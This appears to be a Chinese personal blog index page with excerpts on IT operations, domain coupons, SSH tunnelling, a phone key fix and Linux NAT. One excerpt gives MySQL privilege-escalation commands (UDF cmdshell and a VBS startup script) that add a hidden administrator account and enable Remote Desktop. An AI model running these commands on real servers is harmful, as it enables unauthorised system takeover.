今天在大风的博客上看见题为《我们在做什么?将走向何方?》的文章,原文地址
http://hi.baidu.com/aullik5/blog/item/a2fbb110c6950e75ca80c4f8.html
觉得可以了解到企业内部安全部门的发展趋势,所以转载过来。
“我们在做什么?将走向何方?”
这本来是一个极具有哲学意味的命题,在读大学的时候,我的心理课程老师就专门给我们上过一堂这样的课。但今天在这里,我并不想探讨任何哲学或者人生的问题,只是想讲讲我对甲方安全发展方向的一些理解。对面临就业选择的朋友来说,可以作为一个参考。
今天终于收到了EMS,久违的驾照和实习标签,虽然暂时还没考虑买车。回想整个考驾照的过程实在是不容易啊,从一年前的暑假开始理论考,桩考,之后便卡在了项目考试的连续障碍环节,其中曲折经历不想再提了。。。直到最后在这个寒假才通过了路考,自出生以来耗费精力和财力最多的一本证书啊。
3月中旬就要去实习了,虽然签约的是运维工程师,不过到底什么是运维工程师呢?网上搜索出来的资料也没有明确的定义。不过发现一篇文章写的是对运维工程师的理解,觉得挺好的,转载过来。
对于网站运维,感觉大家还是比较迷惘与不解,确实,这是一个新兴岗位;今天闲来无事,在此结合自已以往的一些经历,与大家先共同探讨一下“什么是门户网站运维”?以下是自已的一些经验和感受请大家斧正,希望和大家一起探讨,共同进步
一、什么是门户网站运维?
首先明确一下,全文所讲的”运维“是指:门户网站运维,与其它运维的区别还是蛮大的;然后我们再对大型网站与小型网站进行范围定义,此定义主要从运维复杂性角度考虑,如网站规范、知名度、服务器量级、pv量等考虑,其它因素不是重点;因此,我们先定义服务器规模大于1000台,pv每天至少上千万(至少国内排名前20),如sina、alibaba、sohu、baidu、网易等 read more »
看到新闻马上注册了一个域名piao2010.com,确实不错,感谢作者月夜,国际顶级域名只要人民币8元,支持支付宝了。以下开始ZZ:
今天发现,继圣诞节爆出顶级优惠码后,全球第一大域名注册商——Godaddy再爆超级优惠——BOWL2010。和上次的优惠码相同,本次优惠码再次让你可以用0.99美元的超低价注册或转移顶级域名。
不过相比上次,因为Godaddy已经开通了对支付宝的支持,所以此次你在支付的过程中甚至可以直接使用支付宝支付,而不是局限于信用卡;换个说法,你可以使用税后8块钱的超低价在Godaddy注册顶级域名,或者将你的顶级域名转移到Godaddy的账户上。月夜 已亲自通过转移域名到Godaddy的实验,证实该方法确实可行。 read more »
本文是转载,仅供系统管理人员安全防护参考之用!
一 UDF提权
这类提权方法我想大家已经知道了,我大致写一下,具体语句如下:
create function cmdshell returns string soname ’udf.dll’
select cmdshell(’net user iis_user 123!@#abcABC /add’);
select cmdshell(’net localgroup administrators iis_user /add’);
select cmdshell(’regedit /s d:\web\3389.reg’);
drop function cmdshell;
select cmdshell(’netstat -an’);
二 VBS启动项提权
create table a (cmd text);
insert into a values (”set wshshell=createobject (”"wscript.shell”") ” );
insert into a values (”a=wshshell.run (”"cmd.exe /c net user iis_user 123!@#abcABC /add”",0) ” ); read more »
应该是很古老的技术了,拿来凑数更新一下博客吧。至于SSH Tunnel代理有什么用途就留给读者思考吧。利用putty的ssh tunnel功能实现安全的代理,原理是当用putty ssh连接到远程服务器的时候,putty可以在本地开启一个端口,本地的应用程序连接到本地的这个端口。相当于putty在本地充当了一个socks代理服务器为本地的应用程序提供socks代理。 read more »
小麦的多普达577w手机按键(确认键)失灵,每次都要花大力气狂按半天才会有反应。。。从网上搜索了半天,多数都是硬件维修。。。不想为旧手机花太多钱所以就找到了这个用其它快捷键代替的方法。感谢作者的辛勤劳动!原文http://hi.baidu.com/zht391/blog/item/d013773180605e1ceac4af68.html
文中提到的软件batchrun比较难找,我已上传到博客方便大家下载,这里下载。
以下开始ZZ:
废话就不再说了,下面开始正题。我以577w用“信息键”替换“返回键”为例。
硬件:577w , 586w 等带快捷键的sp或ppc (必须有快捷键,才能替换嘛,你要拿其他键替换也可以)
软件:batchrun (系统版本无限制) read more »
在学校用了两年多的代理上网(Linux+OpenVPN+Squid),由于代理服务器(个人猜测应该是位于校园网DMZ)和寝室属于不同网络,一直没办法实现NAT方式上网。下午尝试着在VPN接入服务器的基础上进行NAT测试,但是失败了,如果在正常的网络环境中应该是比较容易实现的。以下部分开始转载:(根据自己的理解添加了中文注释)
This tutorial shows how to set up network-address-translation (NAT) on a Linux system with iptables rules so that the system can act as a gateway and provide internet access to multiple hosts on a local network using a single public IP address. This is achieved by rewriting the source and/or destination addresses of IP packets as they pass through the NAT system.
read more »
